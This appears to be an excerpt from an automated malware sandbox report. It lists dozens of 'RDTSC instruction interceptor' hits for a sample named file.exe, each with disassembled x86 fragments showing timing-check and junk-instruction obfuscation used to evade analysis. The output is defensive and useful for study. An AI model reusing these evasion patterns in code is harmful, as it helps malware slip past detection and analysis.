            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0803B second address: E08040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E082BE second address: E082C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E082C2 second address: E082DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FF9ACE940A2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0B519 second address: E0B531 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACEA2293h 0x00000009 pop esi 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0B531 second address: E0B53E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0B53E second address: E0B543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E50D second address: E0E511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E511 second address: E0E517 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DD46 second address: E0DD5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACE9409Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DD5C second address: E0DD60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DD60 second address: E0DD6A instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF9ACE94096h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DD6A second address: E0DD70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DD70 second address: E0DD7D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FF9ACE94098h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DD7D second address: E0DD85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0DEC0 second address: E0DEC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E071 second address: E0E077 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E1B2 second address: E0E1D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF9ACE94096h 0x0000000a jmp 00007FF9ACE940A2h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E1D3 second address: E0E1D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E1D9 second address: E0E1DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E1DF second address: E0E1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E1E5 second address: E0E203 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF9ACE940A9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E203 second address: E0E216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF9ACEA2286h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0E216 second address: E0E21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1073C second address: E10751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FF9ACEA228Bh 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E10751 second address: E10764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 jbe 00007FF9ACE94096h 0x0000000f pop ecx 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E10764 second address: E10777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF9ACEA228Eh 0x00000009 pop esi 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E13C32 second address: E13C36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E13D7F second address: E13D83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E13D83 second address: E13DA5 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FF9ACE94096h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FF9ACE9409Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 jp 00007FF9ACE94096h 0x00000019 pushad 0x0000001a popad 0x0000001b pop edi 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E13DA5 second address: E13DC5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FF9ACEA2296h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E13DC5 second address: E13DC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E14030 second address: E1403A instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF9ACEA2286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1403A second address: E14044 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF9ACE9409Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E14044 second address: E1407A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f jnl 00007FF9ACEA22A4h 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1407A second address: E14080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E14080 second address: E14086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E14086 second address: E1408C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18167 second address: E18191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF9ACEA228Fh 0x0000000b jns 00007FF9ACEA228Ch 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18191 second address: E181AF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FF9ACE940A8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E181AF second address: E181BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18610 second address: E1861F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007FF9ACE94096h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18784 second address: E18788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E18788 second address: E187D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FF9ACE940A2h 0x0000000e push esi 0x0000000f pop esi 0x00000010 jne 00007FF9ACE94096h 0x00000016 popad 0x00000017 jl 00007FF9ACE9409Eh 0x0000001d pushad 0x0000001e popad 0x0000001f jno 00007FF9ACE94096h 0x00000025 popad 0x00000026 push eax 0x00000027 jmp 00007FF9ACE940A6h 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1CD4F second address: E1CD53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1CD53 second address: E1CD59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1CD59 second address: E1CD60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53608EE second address: 536095D instructions: 0x00000000 rdtsc 0x00000002 call 00007FF9ACE940A6h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov esi, eax 0x0000000d jmp 00007FF9ACE940A1h 0x00000012 je 00007FF9ACE94117h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FF9ACE940A3h 0x00000021 adc eax, 47FEF7DEh 0x00000027 jmp 00007FF9ACE940A9h 0x0000002c popfd 0x0000002d push esi 0x0000002e pop edx 0x0000002f popad 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53609BA second address: 53609C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA228Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53609C9 second address: 5360041 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF9ACE9409Fh 0x00000008 mov dh, ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop esi 0x0000000e pushad 0x0000000f mov eax, edx 0x00000011 mov edx, 03E2E510h 0x00000016 popad 0x00000017 leave 0x00000018 pushad 0x00000019 movsx ebx, si 0x0000001c push esi 0x0000001d push edi 0x0000001e pop ecx 0x0000001f pop ebx 0x00000020 popad 0x00000021 retn 0004h 0x00000024 nop 0x00000025 sub esp, 04h 0x00000028 xor ebx, ebx 0x0000002a cmp eax, 00000000h 0x0000002d je 00007FF9ACE941E5h 0x00000033 xor eax, eax 0x00000035 mov dword ptr [esp], 00000000h 0x0000003c mov dword ptr [esp+04h], 00000000h 0x00000044 call 00007FF9B160FBEBh 0x00000049 mov edi, edi 0x0000004b jmp 00007FF9ACE940A7h 0x00000050 xchg eax, ebp 0x00000051 jmp 00007FF9ACE940A6h 0x00000056 push eax 0x00000057 push eax 0x00000058 push edx 0x00000059 jmp 00007FF9ACE9409Eh 0x0000005e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360041 second address: 53600AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA228Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov al, A6h 0x0000000d pushad 0x0000000e mov di, C322h 0x00000012 pushfd 0x00000013 jmp 00007FF9ACEA2293h 0x00000018 add si, 101Eh 0x0000001d jmp 00007FF9ACEA2299h 0x00000022 popfd 0x00000023 popad 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FF9ACEA2298h 0x00000030 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53600AC second address: 53600B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53600B0 second address: 53600B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53600B6 second address: 53600C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF9ACE9409Dh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53600C7 second address: 5360188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a jmp 00007FF9ACEA228Dh 0x0000000f push 37E2AB87h 0x00000014 jmp 00007FF9ACEA2297h 0x00000019 add dword ptr [esp], 3DC7F2C1h 0x00000020 jmp 00007FF9ACEA2296h 0x00000025 push 2FEC0DD5h 0x0000002a pushad 0x0000002b mov esi, edx 0x0000002d mov ax, dx 0x00000030 popad 0x00000031 add dword ptr [esp], 45B91D9Bh 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007FF9ACEA228Bh 0x0000003f adc esi, 74546AFEh 0x00000045 jmp 00007FF9ACEA2299h 0x0000004a popfd 0x0000004b call 00007FF9ACEA2290h 0x00000050 call 00007FF9ACEA2292h 0x00000055 pop ecx 0x00000056 pop edi 0x00000057 popad 0x00000058 mov eax, dword ptr fs:[00000000h] 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360188 second address: 536019B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE9409Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536019B second address: 53601A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53601A1 second address: 53601A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53601A5 second address: 53601D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA228Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007FF9ACEA2296h 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53601D4 second address: 53601D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53601D8 second address: 53601F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA2298h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53601F4 second address: 53601FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53601FA second address: 536021B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007FF9ACEA2292h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536021B second address: 5360220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360220 second address: 53602CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA228Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF9ACEA228Eh 0x00000013 and esi, 73C75D08h 0x00000019 jmp 00007FF9ACEA228Bh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FF9ACEA2298h 0x00000025 add ah, 00000068h 0x00000028 jmp 00007FF9ACEA228Bh 0x0000002d popfd 0x0000002e popad 0x0000002f xchg eax, ebx 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FF9ACEA2294h 0x00000037 jmp 00007FF9ACEA2295h 0x0000003c popfd 0x0000003d movzx esi, bx 0x00000040 popad 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FF9ACEA2299h 0x00000049 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53602CD second address: 53602D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53602D3 second address: 5360312 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACEA2293h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FF9ACEA2296h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FF9ACEA228Ah 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360312 second address: 5360318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360318 second address: 536034D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF9ACEA228Ch 0x00000009 jmp 00007FF9ACEA2295h 0x0000000e popfd 0x0000000f mov cx, 1AB7h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 pushad 0x00000018 mov ecx, ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c push ebx 0x0000001d pop esi 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536034D second address: 536036D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, esi 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FF9ACE940A6h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536036D second address: 53603B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c jmp 00007FF9ACEA2296h 0x00000011 push eax 0x00000012 jmp 00007FF9ACEA228Bh 0x00000017 xchg eax, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF9ACEA2290h 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53603B0 second address: 53603BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE9409Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53603BF second address: 536044E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007FF9ACEA228Bh 0x0000000b and ecx, 3058D30Eh 0x00000011 jmp 00007FF9ACEA2299h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [75AB4538h] 0x0000001f pushad 0x00000020 mov cl, 3Eh 0x00000022 pushfd 0x00000023 jmp 00007FF9ACEA2299h 0x00000028 add ax, 65F6h 0x0000002d jmp 00007FF9ACEA2291h 0x00000032 popfd 0x00000033 popad 0x00000034 xor dword ptr [ebp-08h], eax 0x00000037 jmp 00007FF9ACEA228Eh 0x0000003c xor eax, ebp 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FF9ACEA228Ch 0x00000045 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536044E second address: 5360454 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360454 second address: 5360458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360458 second address: 5360478 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF9ACE940A5h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360478 second address: 536047F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 536047F second address: 53604D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a jmp 00007FF9ACE940A9h 0x0000000f lea eax, dword ptr [ebp-10h] 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FF9ACE9409Ch 0x00000019 sub ch, 00000038h 0x0000001c jmp 00007FF9ACE9409Bh 0x00000021 popfd 0x00000022 mov ax, 6C6Fh 0x00000026 popad 0x00000027 mov dword ptr fs:[00000000h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov cx, bx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53604D5 second address: 53604DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53604DA second address: 53604E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53604E0 second address: 53604E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53604E4 second address: 53604E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53604E8 second address: 5360510 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-18h], esp 0x0000000b pushad 0x0000000c mov dl, cl 0x0000000e mov ebx, 56FA09BAh 0x00000013 popad 0x00000014 mov eax, dword ptr fs:[00000018h] 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FF9ACEA228Ch 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5360510 second address: 536053C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF9ACE9409Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [eax+00000FDCh] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF9ACE940A5h 0x00000016 rdtsc
